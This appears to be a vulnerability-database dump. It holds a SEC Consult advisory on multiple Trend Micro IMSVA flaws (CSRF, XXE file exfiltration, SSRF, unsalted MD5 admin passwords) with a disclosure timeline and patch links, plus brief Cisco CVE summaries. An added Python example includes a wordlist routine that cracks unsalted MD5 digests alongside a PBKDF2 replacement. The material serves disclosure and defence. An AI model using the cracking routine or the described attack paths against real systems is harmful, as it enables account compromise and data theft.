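Why unsalted MD5 is a finding in its own right: one table of candidate hashes cracks every administrator row at once, and two admins with the same password are visibly identical in the database. The following added example (not the advisory's or Trend Micro's code) shows both effects and the replacement a practitioner would expect, a salted, iterated KDF from the standard library with constant-time verification. The digests below are constructed from made-up passwords; the column layout mirrors the advisory's tb_administrator.md5_digest description.

```python
import hashlib
import hmac
import os


def legacy_md5_digest(password):
    """What tb_administrator.md5_digest holds per the advisory: MD5 of the
    password with no salt, so identical passwords give identical digests."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def crack_unsalted(digests, wordlist):
    """One MD5 per candidate word cracks every account at once: the lookup
    table is built once and reused because no salt separates the hashes.
    Returns {digest: password} for every digest found."""
    table = {legacy_md5_digest(w): w for w in wordlist}
    return {d: table[d] for d in digests if d in table}


# OWASP's 2023 recommendation for PBKDF2-HMAC-SHA256.
PBKDF2_ITERATIONS = 600_000


def hash_password(password, iterations=PBKDF2_ITERATIONS):
    """Salted, iterated hash in a self-describing format so the iteration
    count can be raised later without a flag day."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant
    time so a timing side channel cannot leak the digest byte by byte."""
    try:
        algo, iterations, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))
```

Migrating existing rows is straightforward because the old digest is a function of the password alone: rehash on the next successful login, and expire accounts whose MD5 digest is still present after a grace period.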
7) Outdated Software (CVE-2020-27694)
The following software versions are present in an appliance with patch level
1993:
* PHP 5.6.38 (PHP 5.6 is EOL)
* Apache HTTPD 2.4.37 (see http://httpd.apache.org/security/vulnerabilities_24.html)
* Apache Tomcat 9.0.13 (see http://tomcat.apache.org/security-9.html)
The appliance is built on top of a CentOS base system. The CentOS packages
appear not to be updated with appliance updates. In a test system, the command
"yum check-update" yielded 203 updates to installed packages.
Vulnerable / tested versions:
-----------------------------
Version 9.1.0.1960 Critical Patch 1993 has been tested and was found to be
vulnerable. Previous versions are affected as well.
Vendor contact timeline:
------------------------
2020-04-28: Contacting vendor through security@trendmicro.com
Submitting advisory information encrypted (PGP).
2020-04-28: Vendor reply, they will take a look at the issue.
2020-05-06: Vendor states that vulnerability resolution is in progress;
Vendor has questions regarding two vulnerabilities
2020-05-07: Clarifying vulnerabilities
2020-05-25: Asking for status update
2020-05-25: Vendor: Vulnerability resolution is still in progress,
details follow
2020-05-27: Vendor: A fix for 4 vulnerabilities is expected for the end of June
2020-06-29: Asking for status update
2020-07-01: Vendor provides prerelease update that addresses #1, #2, #4, #5, #6
2020-07-07: Sending results of short recheck
#1 CSRF - fixed
#2 XXE - fixed
#4 SSRF/LFD - fixed
#5 InfoDisc - fixed
#6 Password Storage - not properly fixed yet
2020-07-08: Vendor confirms receipt; has question regarding #3
2020-07-10: Clarifying questions
2020-08-04: Asking for a status update
2020-08-04: Vendor: Issue #3 is under investigation, issue #7 in progress.
2020-08-22: Vendor provides information that all issues have been fixed except
issue #3 as hardening it further would potentially break some features.
2020-08-24: Further advisory release coordination (date, CVE numbers, patch version)
2020-09-18: Asking for a status update; Answer: "The hotfix is ready, however, the
official critical patch to be used for public disclosure is still being
finalized"; disclosure date will be communicated later
2020-10-23: Patch has been public since 2020-10-09, but no security bulletin yet;
its publication will be coordinated
2020-11-04: Coordinated release of security advisory
Solution:
---------
The vendor provides a patch (9.1 Patch 3 - Critical Patch - Build 2025)
which should be installed immediately. The release notes can be found here:
https://files.trendmicro.com/documentation/readme/imsva_91_en_criticalpatch_b2025_EN_Readme.txt
Patch download:
https://downloadcenter.trendmicro.com/index.php?regs=nabu&prodid=91
https://files.trendmicro.com/products/imsva/9.1/imsva_91_en_criticalpatch_b2025.tar.gz
Trend Micro Security Bulletin:
https://success.trendmicro.com/solution/000279833
Workaround:
-----------
No workaround available.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF W. Ettlinger / @2020
| VAR-202011-0744 | CVE-2020-27017 | Trend Micro InterScan Messaging Security Virtual Appliance: improper restriction of recursive entity references in DTDs (XXE) |
CVSS V2: 4.0 CVSS V3: 4.9 Severity: MEDIUM |
Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 is vulnerable to an XML External Entity Processing (XXE) vulnerability which could allow an authenticated administrator to read arbitrary local files. An attacker must already have obtained product administrator/root privileges to exploit this vulnerability. Attackers can use the vulnerability to read arbitrary local files.
SEC Consult Vulnerability Lab Security Advisory < 20201104-0 >
=======================================================================
title: Multiple Vulnerabilities
product: Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA)
vulnerable version: < 9.1.0 Critical Patch Build 2025
fixed version: 9.1.0 Critical Patch - Build 2025
CVE number: CVE-2020-27016, CVE-2020-27017, CVE-2020-27018, CVE-2020-27019
CVE-2020-27693, CVE-2020-27694
impact: High
homepage: https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/interscan-messaging.html
found: 2020-04
by: W. Ettlinger (Office Vienna)
T. Serafin (Office Munich)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Trend Micro™ InterScan™ Messaging Security provides the most comprehensive
protection against both traditional and targeted attacks. Using the correlated
intelligence from Trend Micro™ Smart Protection Network™ and optional sandbox
execution analysis, it blocks spam, phishing, and advanced persistent threats
(APTs)."
URL: https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/interscan-messaging.html
Business recommendation:
------------------------
The vendor provides a patch which should be installed immediately.
SEC Consult highly recommends performing a thorough security review of this
and similar Trend Micro products, conducted by security professionals, to
identify and resolve potential further security issues.
Vulnerability overview/description:
-----------------------------------
1) Cross-Site Request Forgery (CSRF)
CVE-2020-27016 (7.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)
A web service accessible to authenticated administrators allows modifying the
appliance's policy configuration. This web service can also be accessed by
leveraging a CSRF scenario. An attacker could therefore modify policy rules
(e.g. bypass malware checks or forward all mails to another host) by tricking
an authenticated administrator into accessing an attacker-controlled web page.
2) XML External Entity Processing (XXE)
CVE-2020-27017 (7.6 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L)
The web service from vulnerability #1 accepts requests in the form of XML documents.
The XML parser used is not configured correctly, thus allowing an authenticated
administrator to read arbitrary local files through XXE.
Through an out-of-band (OOB) XXE attack, an attacker can exfiltrate local files
through CSRF (see #1).
3) Over-privileged Users/Services
Sudo is configured to allow several system users access to the root account.
An attacker gaining control over one of these accounts can access the system as
root. Moreover, several services are executed with the privileges of the user
root. Therefore, finding #2 allows an attacker to read files only accessible to
root (e.g. /etc/shadow).
4) Server Side Request Forgery (SSRF) & Local File Disclosure
CVE-2020-27018 (2.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N/E:U/RL:X/RC:X)
A script accessible through the appliance's web server can be abused to request
any URL (e.g. http(s), file). An authenticated attacker can e.g. access any
http(s) resources or parts of some local files.
5) Information Disclosure
CVE-2020-27019 (4.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L/E:U/RL:X/RC:X)
An SQLite database as well as a cryptographic key located in the webroot can be
accessed without authentication.
Note: It is unclear what the key is used for and whether the SQLite database
could contain sensitive information in specific configurations.
6) Insufficient Password Storage
CVE-2020-27693 (3.1 CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:L/E:U/RL:X/RC:X)
The appliance stores passwords of administrative users as unsalted MD5 hashes
which can be cracked easily.
7) Outdated Software
CVE-2020-27694 (4.6 CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L/E:U/RL:X/RC:X)
Several software components installed on the appliance are outdated. Moreover,
the software updates provided by Trend Micro do not update the packages of the
CentOS base system.
SEC Consult did not verify whether the vulnerabilities identified through the
version information are present or whether the vulnerabilities have an impact
on the security of the system.
| VAR-202011-1023 | CVE-2020-3556 | Cisco AnyConnect Secure Mobility Client Software IPC channel arbitrary script execution vulnerability |
CVSS V2: 4.4 CVSS V3: 7.3 Severity: HIGH |
A vulnerability in the interprocess communication (IPC) channel of Cisco AnyConnect Secure Mobility Client Software could allow an authenticated, local attacker to cause a targeted AnyConnect user to execute a malicious script. The vulnerability is due to a lack of authentication to the IPC listener. An attacker could exploit this vulnerability by sending crafted IPC messages to the AnyConnect client IPC listener. A successful exploit could allow an attacker to cause the targeted AnyConnect user to execute a script. This script would execute with the privileges of the targeted AnyConnect user. In order to successfully exploit this vulnerability, there must be an ongoing AnyConnect session by the targeted user at the time of the attack. To exploit this vulnerability, the attacker would also need valid user credentials on the system upon which the AnyConnect client is being run. Cisco has not released software updates that address this vulnerability. Successful exploitation can result in information disclosure, tampering with information, or denial of service (DoS). Cisco AnyConnect Secure Mobility Client for Linux, for Android and for Windows are all Cisco products: VPN clients that provide secure access to networks and applications from any device on the respective platform.
| VAR-202011-0728 | CVE-2020-27121 | Cisco Unified Communications Manager IM & Presence Service Software vulnerabilities in handling exceptional conditions |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: MEDIUM |
A vulnerability in Cisco Unified Communications Manager IM & Presence Service (Unified CM IM&P) Software could allow an authenticated, remote attacker to cause the Cisco XCP Authentication Service on an affected device to restart, resulting in a denial of service (DoS) condition. The vulnerability is due to improper handling of login requests. An attacker could exploit this vulnerability by sending a crafted client login request to an affected device. A successful exploit could allow the attacker to cause a process to crash, resulting in a DoS condition for new login attempts. Users who are authenticated at the time of the attack would not be affected. There are workarounds that address this vulnerability. Cisco Unified Communications Manager, of which the IM & Presence Service is a component, provides a scalable, distributed and highly available enterprise IP telephony call processing solution.
| VAR-202011-1024 | CVE-2020-3551 | Cisco Identity Services Engine Cross-site Scripting Vulnerability |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface of an affected device. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of an affected interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. Cisco Identity Services Engine (ISE) is Cisco's identity-based, context-aware platform. It monitors the network by collecting real-time information on the network, users and devices, and formulating and enforcing corresponding policies.
| VAR-202011-0729 | CVE-2020-27122 | Cisco Identity Services Engine Vulnerability in privilege management |
CVSS V2: 7.2 CVSS V3: 6.7 Severity: MEDIUM |
A vulnerability in the Microsoft Active Directory integration of Cisco Identity Services Engine (ISE) could allow an authenticated, local attacker to elevate privileges on an affected device. To exploit this vulnerability, an attacker would need to have a valid administrator account on an affected device. The vulnerability is due to incorrect privilege assignment. An attacker could exploit this vulnerability by logging in to the system with a crafted Active Directory account. A successful exploit could allow the attacker to obtain root privileges on an affected device. Cisco Identity Services Engine (ISE) is Cisco's identity-based, context-aware platform. It monitors the network by collecting real-time information on the network, users and devices, and formulating and enforcing corresponding policies.
| VAR-202011-0730 | CVE-2020-27123 | Cisco AnyConnect Secure Mobility Client for Windows IPC channel arbitrary file read vulnerability |
CVSS V2: 4.9 CVSS V3: 5.5 Severity: MEDIUM |
A vulnerability in the interprocess communication (IPC) channel of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to read arbitrary files on the underlying operating system of an affected device. The vulnerability is due to an exposed IPC function. An attacker could exploit this vulnerability by sending a crafted IPC message to the AnyConnect process on an affected device. A successful exploit could allow the attacker to read arbitrary files on the underlying operating system of the affected device